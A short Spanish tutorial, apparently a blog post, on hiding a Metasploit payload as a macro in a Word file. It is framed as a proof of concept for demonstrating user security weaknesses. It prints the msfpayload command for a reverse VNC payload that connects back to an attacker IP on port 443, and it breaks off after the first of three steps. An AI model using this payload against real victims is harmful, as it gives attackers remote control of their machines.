MetaSploit con Microsoft Word

A la hora de demostrar falencias de seguridad por parte de los usuarios, una de las pruebas de concepto más simples y efectivas que podemos realizar es la de incluir un payload de MetaSploit dentro de un archivo Word. En tres simples pasos, vamos a generar un payload de MetaSploit como una macro de visual basic, luego vamos a embeber esta macro en un archivo Word, y finalmente vamos a dejar escuchando por la conexión reversa que se va a realizar cuando la víctima abra el archivo. 1. Generamos el Paylaod Seleccionamos como payload una conexión reversa de VNC, que se conectará a la IP "10.10.10.10" en el puerto "443" : ./msfpayload windows/vncinject/reverse_tcp LHOST=10.10.10.10 LPORT=443 V > payload.bas No es necesario que la víctima tenga instalado un servidor de VNC, pero si que el atacante tenga el vncviewer instalado. Si no lo tiene: "apt-get install vncviewer" .